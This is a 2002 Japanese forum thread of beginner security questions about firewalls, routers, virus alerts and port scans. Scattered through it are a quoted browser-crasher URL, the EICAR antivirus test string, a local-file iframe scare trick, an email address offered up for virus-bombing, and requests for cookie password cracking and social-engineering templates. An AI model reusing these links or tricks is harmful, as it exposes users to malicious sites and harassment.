一応、MACは***にしておきました C:\>netstat -rn Route Table =========================================================================== Interface List 0x1 ........................... MS TCP Loopback interface 0x2 ...** ** ** ** ** ** ...... I-O DATA ET100-PCI Series =========================================================================== =========================================================================== Active Routes: Network Destination Netmask Gateway Interface Metric 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 192.168.0.0 255.255.255.0 192.168.0.1 192.168.0.1 1 192.168.0.1 255.255.255.255 127.0.0.1 127.0.0.1 1 192.168.0.255 255.255.255.255 192.168.0.1 192.168.0.1 1 224.0.0.0 224.0.0.0 192.168.0.1 192.168.0.1 1 255.255.255.255 255.255.255.255 192.168.0.1 192.168.0.1 1 =========================================================================== Persistent Routes: None
一応、HOSTNAMEも****にしておきました C:\>ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : ******* Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : Yes WINS Proxy Enabled. . . . . . . . : No Ethernet adapter ローカル エリア接続: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : I-O DATA ET100-PCI-R Fast Ethernet A dapter Physical Address. . . . . . . . . : **-**-**-**-**-** DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.0.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : NetBIOS over Tcpip. . . . . . . . : Disabled
不思議なことに、接続できるようになりました しかし、インターネット接続共有に関するNISの設定が変になったようで 共有できません。 NISを無効にすると共有接続できます。 やはり 再インストールなんでしょうか?
3月からグローバルIPアドレスがもらえるようになるケーブラーなんですが グローバルIPアドレスでどういうことが出来るのでしょうか? ちなみに、サーバの設置はプロバイダに禁止されています なぜセキュリティ板かというのは、グローバルIPにした場合の危険などがあるようでしたら教えてもらいたかったからです 簡単な説明や使用法、危険を教えてもらえませんか?
132 :
名無しさん@お腹いっぱい。 :02/02/24 16:33
>>131 130じゃないけど、勉強になりました。ありがとうございます。
その記事を読むと、ADSLモデムは危険らしいんですが、
僕のADSLモデムは、設定画面を見ると、ルータモードというので接続してます。
これは、
「ブロードバンドルーターを使用した接続」
(=家庭内ネットワーク上のコンピュータはプライベートIPアドレスを利用するため,ルータが簡易ファイアウォールとなり,インターネット側からの攻撃を回避することができる。)
と同じ状態だと考えて、安心して良いのでしょうか?
基本的には合ってるけど、 ルーターでFW築こうなんて考えちゃいかんよ 思考が全く逆なだけで串厨と同じ
>>133 そうですか。
自分のADSLモデムがルーターになってるって事もよくわからなかったので、
少し安心したんですが。
一応PFWソフト使ってるんですが、知識も設備を整えるお金もないし、
現時点ではこれで精一杯です。
もし良ろしければ、なぜ
> ルーターでFW築こうなんて考えちゃいかんよ
> 思考が全く逆なだけで串厨と同じ
なのか、教えていただけると嬉しいです。
「いかん」けど、安全であることに変わりがないのなら、
今の状態で自分を安心させたいのですが。
何かつたない文章ですいません…。
ルータ(NAT/NAPT&PF)もプロクシも繋ぐためのもの それをセキュリティ確保やそのアンチテーゼとして用いるのはどうかな ってところ 繋ぐことが念頭にあるのであって、 本質的にはセキュアでもなんでもない 実際にはルータにセキュアが付いて回るけどわけだけど グソコのオマケ程度と思えばいいんじゃないかと 販売元が「簡易」FWと言ってるんだし
>>135 なるほど。ありがとうございました。
本質を考えるとってことですね。勉強します。
137 :
(;´Д`) :02/02/24 18:49
>>137 危なそうだと分かってるURLを直リンするお前は?
>>137 この板の初心者質問スレッドを最初から読め。
140げっと
141 :
名無しさん@お腹いっぱい。 :02/02/24 22:01
ウィルスバスター2002をいれていますが、 エロサイトにいってから常に不正アクセスをうけています。 画面右下に出ているマークがずーとベルマークになっているんです。 気持ち悪いんでどうすれば良いでしょうか? 当方初心者なものでお願いします。
>>141 接続一旦切って再接続。
これでIPアドレスが変わると思うけど。
プロバから固定IPアドレスを割り当てられているんじゃなければ。
143 :
名無しさん@お腹いっぱい。 :02/02/25 13:12
どうしたらいいですか? ネットで晒していいか聞いてから晒せやこの単細胞!
このサイトの人に聞くんですか? 英語が堪能ではないので啓発してるのか、何かの宣伝なのか、 教えてほしいのですが。 このサイトを見てどうしたらいいのかもわかりませんし。 なんか怖い。 また来ました。
ソフトの宣伝です。 アナタのHDDの中身を表示しているだけなので、 相手からは何も見えていません。 放置が原則。それより、むやみにリンクをクリックするな。
<iframe src="file:///C|/">か…。 下らない仕掛けだなー。 これで不安感煽って宣伝してるなんていかがわしすぎる。
basic認証のかけ方が分かりません。鯖はおもしろ.com使ってます。 .htaccessファイルは AuthUserFile /public_html/.htpasswd←フルパスを書くんだけどフルパスがわからない。 AuthGroupFile /dev/null AuthName ByPassword AuthType Basic <limit get> require valid-user </limit> こうなってます。.htpasswdファイルには暗号した内容が入っています。 アップしてみるとInternal Sever エラーが出るだけで、 basic認証の画面がでません。 どうすれば、出るのでしょうか?
↑マルチ
↑マルチーズ
>>151 お忙しい中、わざわざ指摘してくれてありがとう。
「わざわざ」なわけないでしょ。「たまたま」見つけたんだよ。
154 :
名無しさん@お腹いっぱい。 :02/02/25 21:43
VPNネタはどこにあるか教えてください
155 :
名無しさん@お腹いっぱい。 :02/02/25 22:19
あれれ VPN関係のスレはどこが適当でしょうか すいません。教えてください
なんでjpgなどというありふれた画像ファイルと同じ拡張子の ウィルスが存在し、gifやmp3やmpgには存在しないんでしょうか。 それともこれから登場する可能性はあるんでしょうか。
>>156 jpgは単なるデータファイル。
もしコードを挿入しても、ダブルクリック後にウイルスの感染活動は起こらない。
現状ではね。
>>154-155 VPNは今のところ関わっている人が少ないせいか、
質問とか出てもなかなか話が進まないんだよねえ。
VPN関係のスレが比較的あるのは通信技術板のようなんで、
ちょっと除いてスレタイトル検索でもしてみれば?
>157 >ダブルクリック後にウイルスの感染活動は起こらない。 そうなんですか・・・?よくxxx.jpgってリンクが2chに 貼りつけられててブラクラだウィルスだと騒いでますが、 (もちろん私は絶対踏みませんけど)あれを踏むと 感染するんじゃないんですか?
知人がBOBONetに引っかかって4万請求されたそうです。 お金の事は相談所とその知人任せでしょうが とりあえず接続の設定だけは直したようなんです。 BOBONetの接続設定を消す→普通に使っていた電話番号を設定し直す→ インターネットオプションで電話番号を確認。電話番号は大丈夫。 やった事はこれです。 ウワサによるとBOBONetの接続プログラムは再起動しても また国際電話回線に接続されると聞いたんですが、これで大丈夫なんでしょうか?
>>159 本当のリンク先がjpgファイルそのものじゃなくて、htmlだから。
>>160 それ、でもブラクラでもないよ。
ただのGIFファイルだし。
>162 そういうことなんですか・・・ありがとうございました。
同じ内容の話題が同時進行していたのに、今になって気付いた。鬱。
すみませんどうしても分からないのでお願いします。
WinXPマシン2台でLANを構築しHTTPDをインストしてWeb鯖を立てました。
こんな感じです。
XPメイン---LAN----XP鯖、TA-----ISDN---------
で、サーバーで
http://127.0.0.1を指定したり 、メインマシンから
http://ローカルアドレス でみるとHPが表示されるのですが、複数の友人宅からは
http://IPで全く見えません 。
何故でしょうか?ひょっとして外部からの80ポートにアクセスするとサーバーではなく
メインの方にアクセスしてしまうんでしょうか?
どのように設定すれば正常に見れますでしょうか?
よろしくお願いします
>>168 ひょっとして友人達って、TAのport80にアクセスしてる?
170 :
名無しさん@お腹いっぱい。 :02/02/26 00:10
RADIO LIFEにウラワザ書いてた。
>>168 ここはセキュリティ板なんだが、なぜここで聞く?
さっきからゾーンアラームが同じIPアドレスから30回くらい 反応するんですけど、これはなんですか?
なんですか?と言われても…こっちからは見えないよ!
213.93.79.228 すいません。このIPです。 これでwho is で見ても全くわからないんですが・・
IPだけじゃ分からないよ!!つーかホットケ!
176 :
名無しさん@お腹いっぱい。 :02/02/26 01:37
自分のHDDが勝手に共有になってしまう。 起動するたびに共有設定にされてしまいます。 これはウイルスの仕業でしょうか?
>>176 もしかしてOSはWindows2000?
>>176 あなたの探しているものは金の斧ですか?銀の斧ですか?
それともこれですか?
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareWks"=dword:00000000
179 :
名無しさん@お腹いっぱい。 :02/02/26 01:40
いいえWIN98です。 フォルダ名の後ろに$マークまで付いてきます。 「C$」って・・・
$は共有してるときに\と区別するためについているんだが どっちにしろファイルプリンタ共有をはずせば戻るだろ
>180 直ったかも・・・ みなさんありがとうございました
182 :
名無しさん@お腹いっぱい。 :02/02/26 01:55
すみません、教えてください。 Tiny2.0.15なのですが、ネットに繋ぐときだけ起動しているのですが そうすると、アドミニ以外では起動できないのですがどうすれば 良いですか?(ロードできないってエラーです) OS:Win2K+SP2、設定で手動で起動するにしてます。 ちなみに、ZONEの時は起動はOK終了が×でした。
184 :
名無しさん@お腹いっぱい。 :02/02/26 03:59
ブラクラの様な物を踏んでしまって、 再起動したらウインドウズの設定を変えられてしまったようなんです。 症状は、まずIEのホームページ設定先を、 ブラクラに変えられてしまいました。 さらに、インターネットオプションで設定を戻そうとしたら、 ”このコンピュータの制限により処理は取り消されました” と表示されてしまい、設定を変えさせてもらえません。 他にも、知らないところをいじられているかもしれません。 だれか対処法を知っている方、いましたら助けてくれませんか? windows板にこの質問を書いたところ、 セキュリティー板に同じ様な質問があると聞いてここに来ましたが、 どれがどれだかさっぱり解りません。 何処に対処法があるか教えてもらえませんか?
www.geocities.com/ccsacla/jpeg/index.html(ブラクラです) ここが変えられてしまったIEのホームページ設定先です。
187 :
名無しさん@お腹いっぱい。 :02/02/26 04:33
CD-ROMが不定期に突然動き出すんですが考えられる原因は何でしょうか? ノートンでウイルスチェックしても何も検出されないんですが。
>>188 スタートアップ、タスクスケジューラ、常駐モノのチェック。
アンチウイルスソフトでFDがガタガタいうてのはよくある話だけど
まさか、CDドライブをチェック対象にしたりとかは??
>>188 関係ないかもしれないけど、最近使ったファイルの削除も。
アングラ系のHPをウロウロしたいのですが、串を当てるようにと注意されました。 ネット接続はル〜タを使用しており、接続方法はダイヤルアップ(ISDN)です。 ル〜タからのネット接続ですから、IEのダイヤルアップの設定の所で、 串を当てても意味ないですよね? そこで、LANの設定という所で同じ事を(串の当て方を見て)すると、 HPの表示すらされなくなります。 ル〜タを使用している場合は串が当てられないのでしょうか? IPとプロバイダ等 しっかり見られてしまうのが嫌です。 また、都合上、MSN用のポ〜トとMX用のポ〜トを閉じてしまう事までは出来ません。 それ以外のポ〜トはガ〜ド出来ていると思いますが・・。 串以外にも、気をつけるべきセキュリティの知識等も教えてください。 お願いします。
193 :
名無しさん@お腹いっぱい。 :02/02/26 13:52
ZONEは4姉妹なのですか?
194 :
>>193 :02/02/26 13:55
いいえ。ポッキーです。
>192 初心者だったら悪いことはしない。これが一番確実。 いくらログを取られても、何もしなければ何も起こらない。
196 :
名無しさん@お腹いっぱい。 :02/02/26 15:10
数日前から、ネットをしているときにおかしいことに気がつきました。 まずアスキーアートの表示のされ方が少し変になりました。 モナーの口とかその他たくさんの文字が黒い長方形で表示されるようになりました。 そしてウィンドウの右上にある最大化・最小化・閉じるのボタンの中の絵が 何だかおかしな表示になってます。 最小化のボタンの絵にに0、最大化に1という数字が現れるようになりました。 この原因は何なのでしょうか? どうか教えてください。
198 :
名無しさん@お腹いっぱい。 :02/02/26 15:52
cookieの値からパスワードを割り出すにはどうすれば良いですか?
>>197 ごめんなさい。
ネット初心者なものでよく分かりません。
FAQとはなんですか?
>>199 わからないことは人の手をわずらわせる前に自分で調べてみましょう。
2chは初心者に仕えるパシリですか。
>>198 マルチ(複数の板やスレに質問を書き込むこと)も嫌われる。
答えられるスキルのある奴はたいていあちこちの板やスレを
見て回っているので、マルチを見るとむかついて
答える気をなくす。
フィルタリングルール作る
ほかのPCで安全なら比較すりゃ分かること
>>202 初心者だから初心者板やPC初心者板を
知らんのだと思われ
210 :
名無しさん@お腹いっぱい。 :02/02/27 00:20
GoogleやYahooでもヒットしませんでした。 システムフォルダのこれは何なのでしょう? (TExUtil.Exeだったら、アクロバットリーダー関係っぽいのですが。) ↓ TExBUtil.Exe
211 :
名無しさん@お腹いっぱい。 :02/02/27 00:25
別のスレにも書いたんですけどレスがつかなくて、 気になって仕方ないのでこちらにも失礼します。 この板の「このウィルス何?」スレに入ろうとしたら ウィルスが検出されました、というウィンドウが出たので慌てて閉じました。 もしかしてあのスレはウィルスに汚染されているのですか? ほっといたら大勢感染してしまうのでしょうか? もしかして凄く危ないのでは? (PCにうといのでたいした事じゃなかったらすみません)
>>210 俺んとこには無い。 プロパティでバージョン情報見れ
>>211 んなもんいちいち気にするな。
特定の文字列があってそれにワクチンソフトが反応しているだけだ。
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
↑これでも反応するはず。
211です。 別スレでもレスもらいました。ホッと一安心(照レ) どうもありがとうございました。
216 :
名無しさん@お腹いっぱい。 :02/02/27 01:15
IEのアップデートしたんで最近出たページを開くと感染するウイルスのURLキボンヌ
217 :
名無しさん :02/02/27 01:20
最新のワクチンファイルをDLした場合、 それは以前のファイルに上書きされるんでしょうか? それとも別のものとして書き込まれるのですか?
>>216 jpgでその辺の質問スレを検索
>>217 そのスレでやれ
>>218 ime.neかime.nuでその辺の質問スレを検索か
初心者板にある
220 :
名無しさん :02/02/27 03:11
>>220 てめーが使ってるアンチウィルスソフトについてのスレッドに決まっちゃいませんでしょうか?
ここで拾ってしまったんですが、 突然女の顔が画面いっぱいに広がって、 「キャーーーー!」って一瞬叫んで何事も 無かったように消えて・・・の繰り返しの ウィルス?をもらっちゃったんですが、 どうやって削除すればいいんでしょうか?
>>190 どうもです。
ノートン2002のAuto-Protectを常駐してるんですがこれが原因ですかね?
(本家で聞いた方がいいかな)
>>224 Auto-Protect切るとNAV入れてる意味がほとんどなくなる。
229 :
たすけて〜 :02/02/27 20:06
さっきから一分おきくらいに誰かはいってこようとしてブロックしましたって でるんですけどどうしたらいいの?退治できないですか?
>229 マルチすんな
231 :
名無しさん@お腹いっぱい。 :02/02/27 20:16
232 :
名無しさん@お腹いっぱい。 :02/02/27 21:22
JOKE_MADO.A
ありがとうございます
236 :
名無しさん :02/02/27 23:42
Win2000のマシンで起動直後に「ワトソン博士がオープンできません」 という変なエラーメッセージが出ます。これはウィルスなんでしょうか? ウィルスバスターで検索しても引っかかりません。
>>236 ワトソン博士、ウイルスじゃないんだけど。
スタートアップかサービスに登録されてしまったんだろうから、はずせばいいのに。
ワトソン博士とピーター・ノートンは同一人物
239 :
名無しさん@お腹いっぱい。 :02/02/28 16:02
なぜか韓国語のHPになってしまうのです これってウイルスでしょうか?
242 :
名無しさん@お腹いっぱい。 :02/02/28 17:08
WinMXで出まわっている「メールアドレスから本名割り出しアプリ」って信用できるんですか? 作者の身元も不明だし・・・・。
出来れば解決方法知りたいのですが・・・>>240 よろしゅうおねがいしまーーーす。
>>242 本名割り出せるわけないでしょ。何考えてんの?
245 :
名無しさん@お腹いっぱい。 :02/02/28 17:30
パーミッション777のファイルってどうすれば 外部からのぞけるの?
>>242 >>244 信用できると思う。
単にほとんどのメールアドレスが「割り出せませんでした」と表示されるだけで(W
きしょい趣味の馬鹿野郎どもがいっぱい釣られてそうだな。w
>>245 ブラウザで見ろや スレ立てんなヴォケ
777のファイルなんか作るな
>>244 今は知らんが、3年くらい前はアンケートとかプレゼントとかのメール送ると結構つれたぞ。
>>250 文章のフォーマットを教えてください。
私はアフォなので、うまい文章がかけません。
ソーシャルハックっていうのでしょうか?そういうの。
>>251 ノ ‐─┬ /
,イ 囗. | / _ 丿丿
| __| ―ナ′
/ ‐' ̄
,‐ /
ナ' ̄ / 、___
/ ノ`‐、_
/ _ 丿丿 _メ | _/
―ナ′ 〈__ X / ̄\
/ ‐' ̄ / V /
/ \ l レ ' `‐ ノ
/ 、___ Χ ̄ ̄〉
\ 丿 /
\ / _
―ナ′__
| _/  ̄ ̄〉 / ,
X / ̄\ ノ / _|
/ V / / く_/`ヽ
レ ' `‐ ノ ―――'フ
/ ̄ ┼┐┬┐
| 〈 / V
`− 乂 人
┼‐ | ―┼‐
┼‐ | |
{__) | _|
| く_/`ヽ
>>252 さん、どうもありがとうございます。
参考にさせていただきます。
>253 大人だなぁ
256 :
名無しさん@お腹いっぱい。 :02/03/01 02:25
>>229 じゃないけど俺のところにも
何かがアクセスしてきている?ようだ。
FWはゾーンアラーム。
気になるのなぜかきっちり3分おきにアクセスしてきていること。
(1,2秒の誤差はあるが)この点からどうも手動ではないみたいだが…
そのIPは207.161.69.222で、調べたらカナダかららしいが
どういうことなんでしょう?
MXで3分おきにリトライされてるとか?
>>257 MXはPCを起動してから立ち上げてないし
ほぼきっちり3分おきなので手動ではないようです。
207.161.69.222 (TCP Port 4152) [TCP Flags: S]
ちなみに↑のポート番号がどんどん大きくなってる。
これのまえは4095、その前は4034でした。
向こう側のプロバイダの回線の仕様で無意識に俺のPCを叩いていってる
っていうことなら問題ないんでしょうが…
>>258 ポートスキャンで順番にノックしてるんじゃない?
なんか、連続でドア叩くと不正アクセスとか、マークされるんで、
間隔あけてるとか。
260 :
名無しさん@お腹いっぱい。 :02/03/01 04:28
ウイルスチェックしたら、2つのフォルダが感染していました。 どちらも同じウイルスで、IEのホームを勝手に書き換えたり、 海外のアダルトサイトを【お気に入り】に追加してしまうというものです。 とりあえず、感染していたフォルダを削除しましたが、 これでOKなのでしょうか?? 本当にくだらない質問ですが、 セキュリティの知識が疎いので、どなたかお教えください。
接続速度の ホスト1 WebArena(NTTPC) 4.60Mbps(1764kB,6.3秒) ホスト2 at-link(C&W IDC) 5.2Mbps(2244kB,3.6秒) で、Mbpsとkbの違いを教えてください
板違い
上がり速度下り速度
いくつかの質問があります。 W2Kでインターネット接続共有しています。 ホストPCはカードモデムでインターネット接続 クライアント側とは有線LAN接続です 質問1 ホストPCのFWとしてNISとBID クライアントPCにはNISだけ で、クライアントPCにNISを入れて意味はあるのでしょうか? 質問2 ホストPCは直接インターネットに接続しているので、 ある程度侵入などのリスクはやむおえないと考えています。 しかしクライアントPCはなるべく安全性を高めたいと思っています。 そこでホストとクライアントの間にルーターを入れたらどうなるでしょうか? なるべく低予算でクライアント側の安全性を高めたいと考えています。 2万円でクライアント側の安全性が100倍になるならそれでもよし 10万円で1万倍になるならそれでもよし。 と考えています。 (どんな計算なんじゃ!ゴルァ!ネットに繋ぐなゴルァ!!って突っ込みは無しで・・・) ということで皆さんのご教授をお待ちしています。
ウイルスヨロシク。 takachan21hotmail.com
260です。
>>261 ウイルス名は、JS_EXCEPTION.GENです。
トレンドマイクロ社のサイトでチェックしました。
269 :
名無しさん@お腹いっぱい。 :02/03/01 14:27
ウィルスに感染してると思うんだけど スキャンしてもでてこない。 最近おかしいなって思う症状は・・・・ ・スキャンディスクができない(他のプログラムが書き込み中で再試行しまくり ・アイコンが変わった(なんか気持ち悪い・・。 ・以前、変なメールを受けとったことがある(添付もあった・・・。
270 :
名無しさん@お腹いっぱい。 :02/03/01 14:50
ノートン先生から 「Backdoor/SubSeven トロイの木馬」 を遮断しましたって警告が出てるんだけど・・・ これってウイルスに感染してるんですか? 一応スキャンかけても出てこないんだけど精神衛生上よくないんで 誰かトロイについて詳しい方教えれ
271 :
名無しさん@お腹いっぱい。 :02/03/01 14:56
感染してないよ・・それは。
>>270 感染を遮断してくれたんだから、ノートン先生に感謝してください。
273 :
名無しさん@お腹いっぱい。 :02/03/01 15:03
>>271 >>272 レスサンクスでし(。・_・)ノ
感染してないのかぁ・・・(ホッ)
無理してノートンさん買ったかいがありました。
それにしても1時間置きにに攻撃してくるんですけど
もしかして狙われてるのかな(汗)
>>265 2kのインターネット接続共有使ってないからわからんのだけど、
静的IPマスカレードがされていないならルータをはさんでも同じかと思う。
あと、ホストPCにある程度侵入は仕方ない、という考え方はやめろ、みなが迷惑する。
LANー>インターネットの経路でデータが漏れるのを防ぐためには(トロイとかね)、
ホストPCでプロキシサーバーを立てて、インターネット接続共有をやめる、という手もあるかとおもう
ノートンあれば平気だと思うけどね。サーバーの立て方がわからないなら、忘れてください。
NISはノートンインターネットセキュリティだとして、BIDは何?
いちお用語辞典とグーグルしらべたんだけどね、わけわからん略語勘弁して。
>>265 インターネット接続の共有を使っている環境においても、
クライアントに Norton Internet Security を入れる意味はあると思います。
説明書にも
「トロイの木馬などのアウトバウンド接続を開始するアプリケーションから
保護するには、各コンピュータにインストールする必要があります」
と記述があります。
>>275 回答ありがとうございます
>ホストPCにある程度侵入は仕方ない、という考え方はやめろ、みなが迷惑する。
えっとですね・・・侵入された疑いがあればすぐにフォーマットできるようにしておく
重要なファイルは置かない、という意味であり、侵入をほったらかしにするという事ではありません・・・
>ホストPCでプロキシサーバーを立てて、・・・
>ノートンあれば平気だと思うけどね。
で、実際のところプロキシ立てた場合とノートンに任せた場合の安全性にどの程度の差があるのか?
ということも含めて教えていただきたいんですが。
プロキシ立てたほうが絶対安全性は高くなるというお話であればそれでもいいかと・・・
BIDはブラックアイス・デフェンダーの略でした・・・
一般的に結構使われているのでこれでいいかと思いましたが・・・申し訳ないです
>>276 そうでした・・
私もレス後に馬鹿な事質問してしまったと懺悔しております
277はBじゃなくて厨房です
279 :
cheshire-cat :02/03/01 19:52
プロクシ ほぼ例外なくHTTPしか中継できない(webサーフ、FTP位) プロクシに対応しているクライアントが必要 webキャッシュのサーバ一括管理 データの中身に対してフィルタリングできる 負荷が高い(相対的に) 設定次第では不正中継の温床になる パケットフィルターと併用すると効果が大きい 設定が面倒(相対的に) NAT/NAPT 大抵のものは何でも通る プロトコル次第では不都合が出る(やや厄介) 負荷が低い(相対的に) パケットフィルターと併用しても効果が小さい(それでも必要) 設定が簡単(相対的に)
>>279 こんな風になってました
IE / Outlook Zones Versions and Settings relating to Internet Explorer and Outlook
黄色三角
Local Account Test 3 account(s) were tested, 3 issue(s) were found.
黄色三角
Unusual Administrators Make sure this user is a proper Administrator on your computer.
〇i
Shares 2 share(s) present on your computer.
〇i
他は〇緑です
283 :
名無しさん@お腹いっぱい。 :02/03/03 03:03
2ちゃん見てるとたまにでかい空白が表示されます。 変ですか?直りますか? ブラウザはIE6でアナログ回線のダイヤルアップ接続です。
284 :
nanasi :02/03/03 03:09
ゾーンアラームではよくアタックがあったのに ウイルスバスターで全然アタックがない気がするんですけど これはやばいんですかね?それともよいことなんですか?
初心者板逝きます・・・
286 :
名無しさん@お腹いっぱい。 :02/03/03 03:57
>>284 えっと、ここんとこ静かだからです ( ´Д`)
287 :
名無しさん@お腹いっぱい。 :02/03/03 04:33
WinMXのChimeのイベントビューアを見ると GET・・・ってところから連休入ってるんですけど、やばいんすか?
289 :
名無しさん@お腹いっぱい。 :02/03/03 06:15
Hotmailの受信トレイからブックマークで跳んだ先が リファラー取ってるサイトだと勝手にメールを読まれたりするんですか?
自分のパソコンがのぞかれてるって事が分かる方法ありますか?
293 :
名無しさん@お腹いっぱい。 :02/03/03 06:54
>290 あの長いURLをコピペして何かいじったらIDとかばれるのかと思ったよ。 とりあえず安心した。レスさんくす。
インターネットマンションとやらの無料LAN接続をしたら、どうやらDHCPも なしで固定のグローバルIPが割り当てられているみたいなんだけど、これって 大丈夫なのかな?あんまりこういうところ(藁)に書き込んだりしないほうがイイの?
>>294 とりあえずルータを買ってみそ、とか言ってみる。
297 :
◆WWF/lJfE :02/03/03 20:50
PE-SPACES.1445というウィルスに感染してしまいました。 Protector Plus 2000という海外のソフトの体験版で、 ある程度は駆除できたんですが、 Windows上では、WindowsフォルダのなかのSYSTEM MEMORYや EXPLORERに付いたこのウィルスを駆除できず、困っています。 このウィルスをDOSモードで駆除するソフトをトレンドマイクロのサイトから ダウンロードしてみても、ウィルスのせいで起動してくれず、 目茶苦茶困ってます。 なんとかする方法があれば、教えて下さい・・・
299 :
◆WWF/lJfE :02/03/03 20:56
>>298 どうも。
それも何回か試してみて、削除出来る(していい)ファイルは
片っ端から削除したんですけど、
使用中のファイルは駆除出来ないんですよね。
>299 再起動してから、そのファイルを削除してみれば
( ´_ゝ`)
まんまるちゃん まんまるちゃん まんま〜るちゃん
304 は壊れてます
>>297 OSをもう一個入れて、そちら側から起動してないOS側をチェックしたら。
308 :
名無しさん@お腹いっぱい。 :02/03/04 12:03
ダウンロードしちゃいけないファイルってどこで情報を得ればよいの?
310 :
名無しさん@お腹いっぱい。 :02/03/04 16:15
WinでIEを使用しているのですが インターネットオプション→セキュリティーを開こうとすると どうしても強制終了してしまいます。 ウイルスにやられてるのでしょうか。
312 :
名無しさん@お腹いっぱい。 :02/03/04 23:21
おなかが痛くなったんですけど、どうしたらいいでしょうか?
315 :
名無しさん@お腹いっぱい。 :02/03/05 00:34
>313 では、取り敢えず夏まで我慢します。
316 :
くだらなくてすまそ。 :02/03/05 15:37
この質問はココでいいのかなぁ? I.E5.5の検索が接続先で書き換えられたっぽくて広告ポップアップが 出る上、単一検索サービスに繋がらなくなってしまったみたい。 で、出てくるポップアップは二個で片方は自動的に消えるのですが もう一方の奴はデスクトップに残ります。 そいつの接続先は→216.65.101.134/gambling/index2.htm これらの障害を取り除いて検索サービスを再び使えるようにしたいので アドバイスおながいします。
317 :
名無しさん@お腹いっぱい。 :02/03/05 17:21
ネットに繋ぐたびにnimdaまみれになりますがどうすればいいんでしょうか 駆除ツールもあらゆるのを試した挙句、日曜に全ドライブフォーマット +OS再インストール(win2k)+IE6インストール これで大丈夫ってんで、2chと少々。そんでもってオンラインウイルス検索にいったらnimdaだらけ なにをすればいいんでしょう
>>316 その検索ってツールバーにある検索のこと?
>>317 オンラインチェックなんかに頼っているからだろ
対策ソフト買えよ
>>317 WindowsUpdateをしてセキュリティホールをふさがないと。
駆除ツールがおいてあるサイトをよくみれば詳しく書いてあるんじゃないかな
321 :
名無しさん@お腹いっぱい。 :02/03/05 18:49
ファイヤーウォールのSygateをインストールしようと思うのですが PGPファイヤーウォールをアンインストールしろとようなことがでてインストール できません。どうしたらできますか?
322 :
名無しさん@お腹いっぱい。 :02/03/05 19:08
323 :
名無しさん@お腹いっぱい。 :02/03/05 19:11
>>317 のNimdaだらけってのは
感染してるのか、htmlを拾ってるだけなのか
どこのフォルダから見つかるとか書かないと
わからないよ。
>>320 お勧めのとおり今とりあえずめぼしいupdateは全部やってみました。
しばらく様子を見たいと思います・・
>>324 temp,system32とかが多いです
>>325 IIS4.0だか5.0だかです・・なるほろ
>>327 ひょっとして、IISを停止せず生きている時にSP2当てようとしてた?
停止も何も考えずに当てちゃいました
>>329 なら100MBのを落として、LANに接続しないでOSインストールしてSP2当てれば解決だね。
・・やっぱもう一回再インストールしたほうがいいですか?
うーん・・そうですね。そうします 色々ありがとうございました!
335 :
名無しさん@お腹いっぱい。 :02/03/05 21:07
テスト用のウィルスの構文みたいなの 2ちゃんでよくコピペしてあったけど、よかったら貼ってください。
336 :
cheshire-cat :02/03/05 21:09
独り言のようなものだけど。 Aliz.Aってさ、ファイル改変とかレジへのキー書き込みしないでしょ。 だから、「テスト用」にはもってこいだよね、NIC抜いていれば。 でもあまりにも評判悪いんで、挫折。
Severe Riskばっかりでした・・ココでちょっと勉強しなおします
340 :
XPな疑問 :02/03/05 23:11
XPネタって遅い気もするんだけどね。 XPってさ、ライセンス認証がすごい!っていってたのに。 哀れ、ライセンス認証しなくてもライセンス取得している困った人が たくさんいるんだよね。 そこで、僕思ったんだけどWinアップデートの時とかってライセンスの 確認しないの? わざわざ「この状態では情報は送信されません」とかでるから、その 後にそういう風にしてるのかと思ってたんだけど。 まさにXPをインストールして最初のライセンスさえクリアすれば後は 楽勝ってわけだったらあんまり意味ないよね(−−; 知ってる人お願いしマース。
344 :
名無しさん@お腹いっぱい。 :02/03/06 00:41
ちょっと前から友人の薦めでBlackICEを使っているんですが、 なんか今日に限って、BlackICE反応しまくり。 90分で約1000回も攻撃してくるんで、もうピーピー鳴りまくりなんです。 一つのところからじゃなくて、4つぐらいから続けてきます。 「侵入者を遮断」しても、すぐ別のから攻撃しかけてきて、 一応全部ブロックしているみたいなんですけど、なんとかなりませんか? ちょっとビビってます。
>>344 LocalとRemoteのポートとプロトコルくらいは書いてくれないと、誰も何も書けない。
>>344 WinMXやっててPingが・・・・・
なんて落ちじゃないよね?
348 :
名無しさん@お腹いっぱい。 :02/03/06 15:56
何で皆 マカフィーを入れないのかが不思議でしょうがない・・ 先生も虫退治も使いにくいしアップデートめんどいじゃん!
今208.11.233.192に 攻撃しかけられてるんだけど・・・
351 :
◆enghYAOw :02/03/06 17:12
友人から「A humor game」という題でメールが送られてきました。 英文で「これは私が作った最初のゲームで・・・」という内容で 添付にインストーラーとHTMLファイルが入っていました。 前まで、英文は怪しいので直に削除していましたが その友人は英語のメールをたまに送ってきていたので、疑いながらも 「あ〜、ゲーム作ったのか〜凄いな〜」 と思いつつクリックしました。 でも何も起こりませんでした。 「おかしいなウィルスかな」 と思って、もう一つのHTMLファイルを開くとブラクラでした… 恐る恐る再起動してみると、壁紙が表示されません。 他の画像、動画ファイルを開こうとしましたが開けませんでした。 「A bone」も正常に起動しないし、なんだかさっきから重くてたまりません。 どうすればいいんでしょうか・・・
>>351 今すぐ回線切ってクリーンインストール!
353 :
名無しさん@お腹いっぱい。 :02/03/06 17:24
>351 んでウイルスチェクの結果は? ソフト無いならダッシュで電気屋へGO!
354 :
◆enghYAOw :02/03/06 17:57
オンラインウィルスチェック試してみたけど、なんかかってにウィンドウ閉じちゃうんですよ。 やっぱアンチウィルスソフト買わなきゃダメですかねぇ?
355 :
名無しさん@お腹いっぱい。 :02/03/06 18:02
>なんかかってにウィンドウ閉じちゃうんですよ。 なんかウィルスに感染してる可能性ありそうだね。ウィルスチェックサイトへの アクセス妨害するウィルスもあるからねえ。 すぐにアンチウィルス買いに行ったほうがいいぞ!
358 :
名無しさん@お腹いっぱい。 :02/03/06 18:35
351は逝ってしまったか。アンチウィルス買いに行ってるのならよいが…
